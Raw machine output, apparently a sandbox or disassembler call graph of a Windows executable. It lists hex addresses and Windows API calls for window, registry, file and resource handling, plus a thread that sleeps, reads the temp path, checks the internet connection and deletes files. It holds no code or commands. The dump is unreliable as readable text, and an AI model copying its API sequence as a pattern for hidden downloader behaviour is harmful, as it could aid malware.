TlsGetValue 46621->46622 46623 406ceb 46621->46623 46624 406cf6 46622->46624 46625 406d1b 46622->46625 46623->46572 46630 406c98 LocalAlloc TlsSetValue 46624->46630 46625->46572 46627 406cfb TlsGetValue 46628 406d0a 46627->46628 46628->46572 46629->46575 46630->46627 46631->46542 46632->46542 46634 405100 46633->46634 46635 405122 46634->46635 46636 405119 46634->46636 46638 405155 46635->46638 46652 404b00 MultiByteToWideChar 46635->46652 46637 4050a0 SysFreeString 46636->46637 46647 405120 46637->46647 46654 405348 SysAllocStringLen SysFreeString 46638->46654 46641 405160 46655 404b00 MultiByteToWideChar 46641->46655 46642 405140 46642->46638 46644 405146 46642->46644 46653 405070 SysAllocStringLen SysFreeString SysAllocStringLen SysFreeString 46644->46653 46646 40516e 46656 405348 SysAllocStringLen SysFreeString 46646->46656 46647->46503 46650 4050b4 46649->46650 46651 4050a6 SysFreeString 46649->46651 46650->46486 46651->46650 46652->46642 46653->46647 46654->46641 46655->46646 46656->46647 46657 409946 ReadFile 46658 409965 46657->46658 46659 45288c 46660 4528a8 46659->46660 46661 452897 46659->46661 46662 4528a1 46661->46662 46663 4528aa 46661->46663 46668 452868 46662->46668 46674 4523c0 63 API calls 46663->46674 46666 4528b7 46675 4523c0 63 API calls 46666->46675 46669 452874 46668->46669 46670 45288a 46668->46670 46676 451c74 46669->46676 46670->46660 46673 451c74 63 API calls 46673->46670 46674->46666 46675->46660 46677 451c92 46676->46677 46682 451d0d 46676->46682 46678 451d0f 46677->46678 46684 451ca0 46677->46684 46679 4523a8 63 API calls 46678->46679 46679->46682 46680 451cf6 46685 4523a8 46680->46685 46682->46673 46683 43e3f8 57 API calls 46683->46684 46684->46680 46684->46683 46686 4523b1 46685->46686 46689 4528e8 46686->46689 46688 4523be 46688->46682 46690 4529da 46689->46690 46691 4528ff 46689->46691 46690->46688 46691->46690 46710 451e88 46691->46710 46694 45295f 46697 451e88 2 API calls 46694->46697 46695 452939 46696 4524f4 63 API calls 46695->46696 46699 45294b 46696->46699 46698 45296d 46697->46698 46700 452997 46698->46700 46701 452971 46698->46701 46702 4524f4 63 API calls 46699->46702 46713 4524f4 46700->46713 46703 4524f4 63 API calls 46701->46703 46705 45295d 46702->46705 46706 452983 46703->46706 46705->46688 46708 4524f4 63 API calls 46706->46708 46708->46705 46709 4524f4 63 API calls 46709->46705 46725 451e08 46710->46725 46712 451e96 46712->46694 46712->46695 46714 45251a 46713->46714 46715 452533 46714->46715 46716 451e08 2 API calls 46714->46716 46717 451e08 2 API calls 46715->46717 46716->46715 46718 452581 46717->46718 46737 4523ec 46718->46737 46720 45259b 46741 452270 60 API calls 46720->46741 46722 4525cc 46723 451e08 2 API calls 46722->46723 46724 4525d7 46723->46724 46724->46709 46733 441704 46725->46733 46727 451e25 GetWindowLongA 46728 451e62 46727->46728 46729 451e42 46727->46729 46736 451d8c GetWindowLongA 46728->46736 46735 451d8c GetWindowLongA 46729->46735 46732 451e4e 46732->46712 46734 44170e 46733->46734 46734->46727 46735->46732 46736->46732 46738 452429 46737->46738 46742 424950 46738->46742 46740 4524ce 46740->46720 46741->46722 46743 424954 GetSysColor 46742->46743 46744 42495f 46742->46744 46743->46744 46744->46740 46745 49ab80 46756 406d28 GetModuleHandleA 46745->46756 46747 49ab90 46760 45a28c 46747->46760 46751 49abc5 46775 45a714 46751->46775 46757 406d5b 46756->46757 46789 404684 46757->46789 46761 45a2ae 46760->46761 46762 45a2eb 46760->46762 47103 45a240 27 API calls 46761->47103 46763 404a14 26 API calls 46762->46763 46765 45a2e9 46763->46765 46766 4049c0 12 API calls 46765->46766 46767 45a30d 46766->46767 46771 45a694 46767->46771 46768 45a2b8 46768->46765 46769 45a2d4 SetWindowTextA 46768->46769 46770 4049c0 12 API calls 46769->46770 46770->46765 46772 45a6a7 46771->46772 47104 452e3c 46772->47104 46773 45a6c8 46773->46751 47307 408d70 25 API calls 46775->47307 46777 45a740 46778 45a7da 46777->46778 46779 45a769 46777->46779 46780 45a75b 46777->46780 46788 40484c 7 API calls 46778->46788 47313 454d78 ShowWindow 46779->47313 46782 45a790 46780->46782 46783 45a792 46780->46783 46784 45a788 46780->46784 46782->46778 47308 45a580 46782->47308 47315 453c80 57 API calls 46783->47315 47314 45a054 71 API calls 46784->47314 46790 4046b7 46789->46790 46793 404624 46790->46793 46794 404660 46793->46794 46795 404633 46793->46795 46794->46747 46795->46794 46798 40275c 25 API calls 46795->46798 46799 446564 46795->46799 46813 405f94 46795->46813 46798->46795 46800 4465dc 46799->46800 46801 44657e GetVersion 46799->46801 46800->46795 46817 446330 GetCurrentProcessId 46801->46817 46805 4465a2 46849 41a548 59 API calls 46805->46849 46807 4465ac 46850 41a4f4 59 API calls 46807->46850 46809 4465bc 46851 41a4f4 59 API calls 46809->46851 46811 4465cc 46852 41a4f4 59 API calls 46811->46852 46814 405fa4 GetModuleFileNameA 46813->46814 46815 405fc0 46813->46815 47084 4061d0 GetModuleFileNameA RegOpenKeyExA 46814->47084 46815->46795 46853 40a664 46817->46853 46820 404a14 26 API calls 46821 446379 46820->46821 46822 446383 GlobalAddAtomA GetCurrentThreadId 46821->46822 46823 40a664 57 API calls 46822->46823 46824 4463bd 46823->46824 46825 404a14 26 API calls 46824->46825 46826 4463ca 46825->46826 46827 4463d4 GlobalAddAtomA 46826->46827 46856 404e80 46827->46856 46831 446401 46862 445f34 46831->46862 46833 44640b 46870 445d5c 46833->46870 46835 446417 46874 457fc8 46835->46874 46837 44642a 46891 4590ac 46837->46891 46839 446440 46905 41a634 59 API calls 46839->46905 46841 44646a GetModuleHandleA 46842 44648a 46841->46842 46843 44647a GetProcAddress 46841->46843 46844 4049c0 12 API calls 46842->46844 46843->46842 46845 44649f 46844->46845 46846 4049c0 12 API calls 46845->46846 46847 4464a7 46846->46847 46848 41a4a8 59 API calls 46847->46848 46848->46805 46849->46807 46850->46809 46851->46811 46852->46800 46906 40a678 46853->46906 46857 404e84 RegisterClipboardFormatA 46856->46857 46858 41af14 46857->46858 46859 41af1a 46858->46859 46860 41af2f RtlInitializeCriticalSection 46859->46860 46861 41af44 46860->46861 46861->46831 46863 4460a1 46862->46863 46864 445f48 SetErrorMode 46862->46864 46863->46833 46865 445f6c GetModuleHandleA GetProcAddress 46864->46865 46866 445f88 46864->46866 46865->46866 46867 445f95 LoadLibraryA 46866->46867 46868 446083 SetErrorMode 46866->46868 46867->46868 46869 445fb1 10 API calls 46867->46869 46868->46833 46869->46868 46871 445d62 46870->46871 46928 445ed0 46871->46928 46873 445dd0 46873->46835 46875 457fd2 46874->46875 46964 421b3c 46875->46964 46877 457fe8 46968 458384 LoadCursorA 46877->46968 46880 458021 46881 45805d 73C9AC50 73C9AD70 73C9B380 46880->46881 46882 458093 46881->46882 46973 424c3c 46882->46973 46884 45809f 46885 424c3c 27 API calls 46884->46885 46886 4580b1 46885->46886 46887 424c3c 27 API calls 46886->46887 46888 4580c3 46887->46888 46977 4587a4 46888->46977 46890 4580d0 46890->46837 46892 4590bb 46891->46892 46893 421b3c 57 API calls 46892->46893 46894 4590d1 46893->46894 46895 45917c LoadIconA 46894->46895 47017 42b7c8 46895->47017 46897 45919f GetModuleFileNameA OemToCharA 46898 4591e8 46897->46898 46899 45920e CharLowerA 46898->46899 46901 459231 46899->46901 46900 459242 47043 45b188 12 API calls 46900->47043 46901->46900 47019 4593b4 46901->47019 46904 459264 46904->46839 46905->46841 46908 40a69c 46906->46908 46907 40a6c7 46910 40a71f 46907->46910 46917 40a6dc 46907->46917 46908->46907 46919 40a26c 57 API calls 46908->46919 46923 404ab0 46910->46923 46912 40a673 46912->46820 46913 40a715 46922 40500c 26 API calls 46913->46922 46915 4049c0 12 API calls 46915->46917 46917->46913 46917->46915 46920 40500c 26 API calls 46917->46920 46921 40a26c 57 API calls 46917->46921 46919->46907 46920->46917 46921->46917 46922->46912 46924 404a84 25 API calls 46923->46924 46925 404ac0 46924->46925 46926 4049c0 12 API calls 46925->46926 46927 404ad8 46926->46927 46927->46912 46929 445edf 46928->46929 46930 445ed8 46928->46930 46941 445e34 46929->46941 46931 445edd 46930->46931 46936 445f0a SystemParametersInfoA 46930->46936 46937 445f1b SendMessageA 46930->46937 46931->46873 46934 445ef5 46945 445e50 SystemParametersInfoA 46934->46945 46935 445eec 46944 445e80 6 API calls 46935->46944 46936->46931 46937->46931 46940 445efc 46940->46873 46946 42c5e4 46941->46946 46944->46931 46945->46940 46947 42c5f4 46946->46947 46950 42c614 46946->46950 46953 42c4fc 46947->46953 46951 42c645 GetSystemMetrics 46950->46951 46952 42c64b 46950->46952 46951->46952 46952->46934 46952->46935 46954 42c512 46953->46954 46956 42c585 46954->46956 46957 42c56d 46954->46957 46960 42c4fc 12 API calls 46954->46960 46955 4049c0 12 API calls 46958 42c5ba KiUserCallbackDispatcher 46955->46958 46956->46955 46959 42c575 GetProcAddress 46957->46959 46958->46952 46959->46956 46961 42c557 46960->46961 46961->46957 46962 42c565 46961->46962 46963 4049c0 12 API calls 46962->46963 46963->46957 46966 421b43 46964->46966 46965 421b66 46965->46877 46966->46965 46995 421cf4 57 API calls 46966->46995 46969 4583a3 46968->46969 46970 4583bc LoadCursorA 46969->46970 46972 45800b GetKeyboardLayout 46969->46972 46996 45843c 46970->46996 46972->46880 46974 424c42 46973->46974 46999 424180 46974->46999 46976 424c64 46976->46884 46979 4587bd 46977->46979 46978 4587ee SystemParametersInfoA 46980 458801 CreateFontIndirectA 46978->46980 46981 458819 GetStockObject 46978->46981 46979->46978 47009 424fcc 46980->47009 46983 424fcc 30 API calls 46981->46983 46985 45882d SystemParametersInfoA 46983->46985 46986 458881 46985->46986 46987 45884d CreateFontIndirectA 46985->46987 47014 4250b0 30 API calls 46986->47014 46988 424fcc 30 API calls 46987->46988 46990 458866 CreateFontIndirectA 46988->46990 46992 424fcc 30 API calls 46990->46992 46991 458891 GetStockObject 46993 424fcc 30 API calls 46991->46993 46994 45887f 46992->46994 46993->46994 46994->46890 46995->46965 46997 40275c 25 API calls 46996->46997 46998 45844f 46997->46998 46998->46969 47000 42419b 46999->47000 47007 424168 RtlEnterCriticalSection 47000->47007 47002 4241a5 47004 40275c 25 API calls 47002->47004 47006 424202 47002->47006 47004->47006 47005 424253 47005->46976 47008 424174 RtlLeaveCriticalSection 47006->47008 47007->47002 47008->47005 47015 424b88 GetObjectA 47009->47015 47011 424fde 47016 424dc0 29 API calls 47011->47016 47013 424fe7 47013->46985 47014->46991 47015->47011 47016->47013 47018 42b7d4 47017->47018 47018->46897 47020 4593dd 47019->47020 47021 45953f 47019->47021 47020->47021 47044 422bcc 47020->47044 47022 4049c0 12 API calls 47021->47022 47024 459554 47022->47024 47024->46900 47025 4593f6 GetClassInfoA 47026 45941c RegisterClassA 47025->47026 47031 459451 47025->47031 47027 459435 47026->47027 47026->47031 47056 406a70 47027->47056 47029 459442 47062 40d144 47029->47062 47047 407ae4 47031->47047 47033 4594a8 47034 4049c0 12 API calls 47033->47034 47035 4594b6 SetWindowLongA 47034->47035 47036 4594d6 47035->47036 47037 459501 GetSystemMenu DeleteMenu DeleteMenu 47035->47037 47051 45a038 47036->47051 47037->47021 47039 459532 DeleteMenu 47037->47039 47039->47021 47041 45a038 64 API calls 47042 4594f5 SetClassLongA 47041->47042 47042->47037 47043->46904 47045 422bdc VirtualAlloc 47044->47045 47046 422c0a 47044->47046 47045->47046 47046->47025 47066 402c0c 47047->47066 47049 407af7 CreateWindowExA 47050 407b2f 47049->47050 47050->47033 47067 42b534 47051->47067 47054 45a047 LoadIconA 47055 4594dd SendMessageA 47054->47055 47055->47041 47057 406a80 47056->47057 47058 406ab1 47056->47058 47057->47058 47079 405fdc 47057->47079 47058->47029 47060 406aa0 LoadStringA 47061 404ab0 26 API calls 47060->47061 47061->47058 47063 40d14b 47062->47063 47064 404a14 26 API calls 47063->47064 47065 40d163 47064->47065 47065->47031 47066->47049 47070 42b570 47067->47070 47071 42b53e 47070->47071 47072 42b580 47070->47072 47071->47054 47071->47055 47072->47071 47073 41d8cc 57 API calls 47072->47073 47074 42b59f 47073->47074 47074->47071 47075 42b5b9 47074->47075 47076 42b5ac 47074->47076 47077 426aa0 63 API calls 47075->47077 47078 425f4c 57 API calls 47076->47078 47077->47071 47078->47071 47080 406003 47079->47080 47081 405fe6 47079->47081 47080->47060 47081->47080 47082 405f94 30 API calls 47081->47082 47083 405ffc 47082->47083 47083->47060 47085 406253 47084->47085 47086 406213 RegOpenKeyExA 47084->47086 47102 406018 12 API calls 47085->47102 47086->47085 47087 406231 RegOpenKeyExA 47086->47087 47087->47085 47089 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 47087->47089 47093 406313 47089->47093 47094 4063f6 47089->47094 47090 406278 RegQueryValueExA 47091 406298 RegQueryValueExA 47090->47091 47092 4062b6 RegCloseKey 47090->47092 47091->47092 47092->46815 47093->47094 47096 406323 lstrlen 47093->47096 47094->46815 47097 40633b 47096->47097 47097->47094 47098 406360 lstrcpyn LoadLibraryExA 47097->47098 47099 406388 47097->47099 47098->47099 47099->47094 47100 406392 lstrcpyn LoadLibraryExA 47099->47100 47100->47094 47101 4063c4 lstrcpyn LoadLibraryExA 47100->47101 47101->47094 47102->47090 47103->46768 47105 452e52 47104->47105 47106 452f66 47105->47106 47113 41aa2c 47105->47113 47106->46773 47108 452f2b 47108->46773 47109 452ee2 47109->47108 47110 406a70 57 API calls 47109->47110 47111 452f19 47110->47111 47123 40d180 57 API calls 47111->47123 47114 41aa42 47113->47114 47115 41aa77 47114->47115 47136 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47114->47136 47124 41a984 47115->47124 47119 41aaa2 47121 41aaba 47119->47121 47138 41a928 57 API calls 47119->47138 47121->47109 47123->47108 47127 41a9ae 47124->47127 47135 41aa02 47124->47135 47125 4049c0 12 API calls 47126 41aa19 47125->47126 47126->47119 47137 41a8f8 57 API calls 47126->47137 47128 41a984 138 API calls 47127->47128 47127->47135 47129 41a9c6 47128->47129 47139 405f8c 47129->47139 47132 405fdc 30 API calls 47133 41a9f4 47132->47133 47142 41a81c 47133->47142 47135->47125 47136->47115 47137->47119 47138->47121 47151 405f64 VirtualQuery 47139->47151 47143 41a82d 47142->47143 47144 41a83c FindResourceA 47143->47144 47145 41a899 47144->47145 47146 41a84c 47144->47146 47145->47135 47153 41e0d0 47146->47153 47148 41a85d 47157 41da30 47148->47157 47150 41a878 47150->47135 47152 405f7e 47151->47152 47152->47132 47154 41e0da 47153->47154 47162 41e198 FindResourceA 47154->47162 47156 41e108 47156->47148 47174 41e254 47157->47174 47159 41da4c 47178 420288 47159->47178 47161 41da67 47161->47150 47163 41e1c4 LoadResource 47162->47163 47164 41e1bd 47162->47164 47166 41e1d7 47163->47166 47167 41e1de SizeofResource LockResource 47163->47167 47172 41e128 57 API calls 47164->47172 47173 41e128 57 API calls 47166->47173 47170 41e1fc 47167->47170 47168 41e1c3 47168->47163 47170->47156 47171 41e1dd 47171->47167 47172->47168 47173->47171 47175 41e25e 47174->47175 47176 40275c 25 API calls 47175->47176 47177 41e277 47176->47177 47177->47159 47207 420670 47178->47207 47181 420300 47260 420694 47181->47260 47182 420335 47183 420694 57 API calls 47182->47183 47185 420346 47183->47185 47187 42034f 47185->47187 47188 42035c 47185->47188 47190 420694 57 API calls 47187->47190 47191 420694 57 API calls 47188->47191 47196 420328 47190->47196 47193 420377 47191->47193 47192 420313 47195 420694 57 API calls 47192->47195 47270 420228 57 API calls 47193->47270 47195->47196 47212 41a0e8 47196->47212 47199 406cdc 4 API calls 47200 4203d0 47199->47200 47203 420460 47200->47203 47223 425a84 47200->47223 47227 425d3c 47200->47227 47237 4534ec 47200->47237 47201 4204a0 47201->47161 47203->47201 47271 41ac6c 57 API calls 47203->47271 47272 41ee34 47207->47272 47210 4202c1 47210->47181 47210->47182 47213 41a0f5 47212->47213 47278 419fd4 RtlEnterCriticalSection 47213->47278 47215 41a1cf 47279 41a08c RtlLeaveCriticalSection 47215->47279 47218 41a1e6 47218->47199 47221 41a12c 47222 41a18e 47221->47222 47280 41ac6c 57 API calls 47221->47280 47281 419b10 57 API calls 47221->47281 47222->47215 47282 41ac6c 57 API calls 47222->47282 47224 425d3c 74 API calls 47223->47224 47225 425a9a 47224->47225 47226 425ab3 GetTextExtentPoint32A 47225->47226 47226->47203 47232 425d55 47227->47232 47234 425da2 47227->47234 47228 425d79 47229 425d8a 47228->47229 47284 425dd8 19 API calls 47228->47284 47231 425d96 47229->47231 47285 425e04 6 API calls 47229->47285 47231->47234 47286 425e34 10 API calls 47231->47286 47232->47228 47283 40d200 57 API calls 47232->47283 47234->47203 47238 4534ff 47237->47238 47287 43d6f8 47238->47287 47240 45354a 47241 4535b9 47240->47241 47243 4536b6 47240->47243 47247 4535aa MulDiv 47240->47247 47292 453874 75 API calls 47241->47292 47250 45371b 47243->47250 47295 452b4c 65 API calls 47243->47295 47244 4535d2 47244->47243 47293 452b4c 65 API calls 47244->47293 47246 453709 47296 4411c8 57 API calls 47246->47296 47291 424ff8 29 API calls 47247->47291 47250->47203 47252 4535f3 47294 4411c8 57 API calls 47252->47294 47254 453606 47255 453635 47254->47255 47256 453612 MulDiv 47254->47256 47257 453664 47255->47257 47258 453641 MulDiv 47255->47258 47256->47255 47257->47243 47259 453670 MulDiv MulDiv 47257->47259 47258->47257 47259->47243 47261 41ee34 57 API calls 47260->47261 47262 4206a9 47261->47262 47263 404ab0 26 API calls 47262->47263 47264 4206b7 47263->47264 47301 404ed8 47264->47301 47267 41ee34 57 API calls 47268 42030b 47267->47268 47269 41a398 59 API calls 47268->47269 47269->47192 47270->47196 47271->47203 47275 41ee3f 47272->47275 47273 41ee79 47273->47210 47276 41e8f4 57 API calls 47273->47276 47275->47273 47277 41ee80 57 API calls 47275->47277 47276->47210 47277->47275 47278->47221 47279->47218 47280->47221 47281->47221 47282->47222 47283->47228 47284->47229 47285->47231 47286->47234 47288 43d70a 47287->47288 47297 43a3b8 47288->47297 47290 43d722 47290->47240 47291->47241 47292->47244 47293->47252 47294->47254 47295->47246 47296->47250 47298 43a3d4 47297->47298 47299 421f9c 104 API calls 47298->47299 47300 43a3ea 47299->47300 47300->47290 47302 404e8c 47301->47302 47303 404ec7 47302->47303 47304 404a84 25 API calls 47302->47304 47303->47267 47305 404ea3 47304->47305 47305->47303 47306 40277c 12 API calls 47305->47306 47306->47303 47307->46777 47316 45a4e8 PeekMessageA 47308->47316 47311 45a59c 47311->46782 47313->46780 47314->46782 47315->46782 47317 45a504 47316->47317 47318 45a572 47316->47318 47317->47318 47329 45a448 47317->47329 47318->47311 47328 45ae50 90 API calls 47318->47328 47327 45a564 TranslateMessage DispatchMessageA 47327->47318 47328->47311 47330 45a473 47329->47330 47331 45a45c 47329->47331 47330->47318 47333 45a340 47330->47333 47331->47330 47353 45b3a8 8 API calls 47331->47353 47334 45a350 47333->47334 47335 45a38a 47333->47335 47334->47335 47336 45a377 TranslateMDISysAccel 47334->47336 47335->47318 47337 45a390 47335->47337 47336->47335 47338 45a441 47337->47338 47339 45a3a8 47337->47339 47338->47318 47350 45a31c 47338->47350 47339->47338 47340 45a3b3 GetCapture 47339->47340 47341 45a414 GetWindowLongA 47340->47341 47345 45a3be 47340->47345 47341->47338 47342 45a424 SendMessageA 47341->47342 47342->47338 47344 45a410 47342->47344 47344->47338 47346 45a3ef 47345->47346 47347 45a3d8 GetParent 47345->47347 47349 45a3cf 47345->47349 47354 437e5c 7 API calls 47345->47354 47348 45a3f5 SendMessageA 47346->47348 47346->47349 47347->47345 47348->47338 47348->47344 47349->47348 47351 45a33c 47350->47351 47352 45a32f IsDialogMessage 47350->47352 47351->47318 47351->47327 47352->47351 47353->47330 47354->47345 47355 40408a 47360 40416d 47355->47360 47361 40409d 47355->47361 47356 404110 47357 404140 RtlUnwind 47356->47357 47358 40412b UnhandledExceptionFilter 47356->47358 47359 406cdc 4 API calls 47357->47359 47358->47357 47358->47360 47359->47360 47361->47356 47361->47360 47362 4040f0 UnhandledExceptionFilter 47361->47362 47362->47360 47363 404105 47362->47363 47363->47357 47364 4348a8 47365 4348d3 47364->47365 47366 43497d 47364->47366 47368 4348e3 SendMessageA 47365->47368 47367 4049c0 12 API calls 47366->47367 47369 434992 47367->47369 47370 434901 47368->47370 47371 4348ef 47368->47371 47373 434912 SendMessageA 47370->47373 47382 404ccc 47371->47382 47373->47366 47375 43491e 47373->47375 47374 4348ff 47376 434959 SendMessageA 47374->47376 47377 43492e SendMessageA 47375->47377 47378 434967 47376->47378 47377->47366 47379 434938 47377->47379 47381 434977 SendMessageA 47378->47381 47380 404ccc 26 API calls 47379->47380 47380->47374 47381->47366 47383 404cd0 47382->47383 47384 404d31 47382->47384 47385 404a14 47383->47385 47386 404cd8 47383->47386 47387 404a28 47385->47387 47392 404a84 25 API calls 47385->47392 47386->47384 47389 404ce7 47386->47389 47390 404a14 26 API calls 47386->47390 47388 404a56 47387->47388 47393 40277c 12 API calls 47387->47393 47388->47374 47391 404a84 25 API calls 47389->47391 47390->47389 47394 404d01 47391->47394 47392->47387 47393->47388 47395 404a14 26 API calls 47394->47395 47396 404d2d 47395->47396 47396->47374 47397 41daec 47400 4099a0 SetFilePointer 47397->47400 47399 41db03 47400->47399 47401 402d70 47402 402d86 47401->47402 47403 402de8 CreateFileA 47402->47403 47404 402e9a GetStdHandle 47402->47404 47415 402d8c 47402->47415 47405 402e06 47403->47405 47406 402f0e GetLastError 47403->47406 47404->47406 47409 402ed5 47404->47409 47408 402e14 GetFileSize 47405->47408 47405->47409 47406->47415 47408->47406 47410 402e28 47408->47410 47411 402edf GetFileType 47409->47411 47409->47415 47412 402e31 SetFilePointer 47410->47412 47413 402e2f 47410->47413 47414 402efa CloseHandle 47411->47414 47411->47415 47412->47406 47416 402e44 ReadFile 47412->47416 47413->47412 47414->47415 47416->47406 47417 402e66 47416->47417 47417->47409 47418 402e79 SetFilePointer 47417->47418 47418->47406 47419 402e8e SetEndOfFile 47418->47419 47419->47406 47420 402e98 47419->47420 47420->47409 47421 437d70 SetWindowLongA GetWindowLongA 47422 437daf GetWindowLongA 47421->47422 47423 437dcd SetPropA SetPropA 47421->47423 47422->47423 47424 437dbe SetWindowLongA 47422->47424 47427 422ba4 47423->47427 47424->47423 47433 498248 47427->47433 47436 43f118 47427->47436 47452 43eec0 47427->47452 47459 459934 47427->47459 47428 422bba 47434 441704 47433->47434 47435 498253 CreateThread 47434->47435 47435->47428 47543 497cf0 47435->47543 47437 43f143 47436->47437 47438 43f12b 47436->47438 47441 43f13e 47437->47441 47673 43f084 59 API calls 47437->47673 47439 43f19d 47438->47439 47446 43f12d 47438->47446 47440 43c1fc 153 API calls 47439->47440 47447 43f1a6 47440->47447 47443 43f1da 47441->47443 47662 43c1fc 47441->47662 47443->47428 47444 43f1f7 47444->47441 47450 43f1fb 47444->47450 47446->47441 47448 43f23a GetCapture 47446->47448 47447->47443 47672 43eff0 58 API calls 47447->47672 47448->47441 47450->47443 47451 43f21e NtdllDefWindowProc_A 47450->47451 47451->47443 47458 43f118 156 API calls 47452->47458 47453 43eeef 47715 4399a4 90 API calls 47453->47715 47455 43ef01 47716 428b50 92 API calls 47455->47716 47457 43ef06 47457->47428 47458->47453 47460 45999c 47459->47460 47466 45996a 47459->47466 47717 4597e8 47460->47717 47462 4599a7 47464 459a65 47462->47464 47465 4599b7 47462->47465 47467 459a6c 47464->47467 47468 459abb 47464->47468 47469 459f03 47465->47469 47470 4599bd 47465->47470 47466->47460 47539 45998b 47466->47539 47725 41ac6c 57 API calls 47466->47725 47471 459a72 47467->47471 47499 459ddb 47467->47499 47477 459f1d 47468->47477 47478 459ac8 47468->47478 47483 459a49 47468->47483 47737 45aae4 13 API calls 47469->47737 47475 459a31 47470->47475 47476 459a4e 47470->47476 47470->47483 47470->47539 47473 459aa2 47471->47473 47474 459a79 47471->47474 47473->47483 47493 459db9 47473->47493 47473->47539 47490 459a86 47474->47490 47491 459afd 47474->47491 47474->47539 47484 459fa7 47475->47484 47485 459a37 47475->47485 47486 459a57 47476->47486 47487 459b93 47476->47487 47479 459f26 47477->47479 47480 459f3e 47477->47480 47481 459ec4 IsIconic 47478->47481 47482 459ad3 47478->47482 47738 45a5a4 26 API calls 47479->47738 47739 45a600 58 API calls 47480->47739 47494 459ed8 GetFocus 47481->47494 47481->47539 47482->47469 47482->47483 47483->47539 47724 4598ac NtdllDefWindowProc_A 47483->47724 47742 4598ac NtdllDefWindowProc_A 47484->47742 47495 459f81 47485->47495 47496 459a40 47485->47496 47486->47483 47497 459ce4 47486->47497 47498 45a038 64 API calls 47487->47498 47490->47483 47500 459c9c SendMessageA 47490->47500 47502 459b0f 47491->47502 47503 459b18 47491->47503 47733 45a47c IsWindowEnabled 47493->47733 47504 459ee9 47494->47504 47494->47539 47501 445ed0 24 API calls 47495->47501 47496->47483 47505 459bc7 47496->47505 47517 459d12 47497->47517 47497->47539 47498->47539 47515 459e01 IsWindowEnabled 47499->47515 47499->47539 47500->47539 47508 459f93 47501->47508 47509 459b25 47502->47509 47510 459b16 47502->47510 47726 45a054 71 API calls 47503->47726 47736 451750 GetCurrentThreadId 73C9AC10 47504->47736 47729 4598ac NtdllDefWindowProc_A 47505->47729 47740 459840 12 API calls 47508->47740 47727 45a104 68 API calls 47509->47727 47728 4598ac NtdllDefWindowProc_A 47510->47728 47514 459bcd 47520 459c0c 47514->47520 47521 459bea 47514->47521 47522 459e0f 47515->47522 47515->47539 47732 40edc4 SetErrorMode LoadLibraryA 47517->47732 47519 459ef0 47526 459ef8 SetFocus 47519->47526 47519->47539 47731 45973c 63 API calls 47520->47731 47730 45974c 58 API calls 47521->47730 47533 459e16 IsWindowVisible 47522->47533 47523 459f9e 47741 4598ac NtdllDefWindowProc_A 47523->47741 47526->47539 47530 459d21 47534 459d70 GetLastError 47530->47534 47535 459d30 GetProcAddress 47530->47535 47531 459bf2 PostMessageA 47531->47539 47532 459c14 PostMessageA 47532->47539 47536 459e24 GetFocus 47533->47536 47533->47539 47534->47539 47537 459d58 47535->47537 47535->47539 47538 441704 47536->47538 47537->47539 47540 459e39 SetFocus 47538->47540 47539->47428 47734 43c130 47540->47734 47544 497cf8 47543->47544 47544->47544 47545 497cff Sleep 47544->47545 47624 4737b0 GetTempPathA 47545->47624 47547 497d22 47626 472d44 47547->47626 47551 497d4c 47552 4737b0 GetTempPathA 47551->47552 47553 497d54 47552->47553 47554 472d44 28 API calls 47553->47554 47555 497d69 47554->47555 47556 404d40 26 API calls 47555->47556 47557 497d7e 47556->47557 47558 474d34 InternetGetConnectedState 47557->47558 47567 497d87 47558->47567 47559 4049e4 12 API calls 47560 498135 47559->47560 47562 4049c0 12 API calls 47560->47562 47561 404a58 12 API calls 47561->47567 47563 49813d 47562->47563 47564 4049e4 12 API calls 47563->47564 47565 49814a 47564->47565 47566 474d50 46 API calls 47566->47567 47567->47561 47567->47566 47568 497e02 47567->47568 47569 4967d4 12 API calls 47567->47569 47579 497f63 47567->47579 47604 4980dc 47567->47604 47570 430158 26 API calls 47568->47570 47569->47567 47571 497e11 47570->47571 47572 4758e8 26 API calls 47571->47572 47573 497e3a 47572->47573 47574 404a14 26 API calls 47573->47574 47575 497e47 47574->47575 47578 4758e8 26 API calls 47575->47578 47576 404a58 12 API calls 47576->47579 47577 4967d4 12 API calls 47577->47579 47580 497e6e 47578->47580 47579->47576 47579->47577 47582 474d50 46 API calls 47579->47582 47584 49801a 47579->47584 47579->47604 47581 404a14 26 API calls 47580->47581 47583 497e7b 47581->47583 47582->47579 47586 4758e8 26 API calls 47583->47586 47585 49a3e0 417 API calls 47584->47585 47587 498026 47585->47587 47588 497ea2 47586->47588 47591 472ef0 26 API calls 47587->47591 47589 404a14 26 API calls 47588->47589 47592 497eaf 47589->47592 47593 498058 47591->47593 47594 4758e8 26 API calls 47592->47594 47595 498067 47593->47595 47596 4980b6 47593->47596 47597 497ed6 47594->47597 47599 473490 15 API calls 47595->47599 47598 473490 15 API calls 47596->47598 47600 404a14 26 API calls 47597->47600 47601 4980cc 47598->47601 47602 49807c 47599->47602 47603 497ee3 47600->47603 47601->47604 47607 45a800 PostQuitMessage 47601->47607 47605 49808e 47602->47605 47606 498080 47602->47606 47610 4758e8 26 API calls 47603->47610 47604->47559 47609 473490 15 API calls 47605->47609 47608 45a800 PostQuitMessage 47606->47608 47607->47604 47611 49808c 47608->47611 47612 4980a4 47609->47612 47613 497f0a 47610->47613 47611->47604 47612->47604 47615 45a800 PostQuitMessage 47612->47615 47614 404a14 26 API calls 47613->47614 47616 497f17 47614->47616 47615->47611 47617 409628 57 API calls 47616->47617 47618 497f21 47617->47618 47619 409628 57 API calls 47618->47619 47620 497f37 47619->47620 47621 4967d4 12 API calls 47620->47621 47622 497f3f 47620->47622 47621->47622 47623 409bac DeleteFileA 47622->47623 47623->47579 47625 4737cd 47624->47625 47625->47547 47647 402bc8 QueryPerformanceCounter 47626->47647 47628 472d64 47650 404a58 47628->47650 47631 4049c0 12 API calls 47633 472d78 47631->47633 47634 404c88 26 API calls 47633->47634 47635 472da8 47633->47635 47654 404ba8 47633->47654 47634->47633 47657 4049e4 47635->47657 47638 404d40 47639 404d51 47638->47639 47640 404d77 47639->47640 47641 404d8e 47639->47641 47661 40500c 26 API calls 47640->47661 47642 404a84 25 API calls 47641->47642 47644 404d84 47642->47644 47645 404dbf 47644->47645 47646 404a14 26 API calls 47644->47646 47646->47645 47648 402be0 GetTickCount 47647->47648 47649 402bd5 47647->47649 47648->47628 47649->47628 47652 404a5c 47650->47652 47651 404a80 47651->47631 47652->47651 47653 40277c 12 API calls 47652->47653 47653->47651 47655 404ab0 26 API calls 47654->47655 47656 404bb5 47655->47656 47656->47633 47659 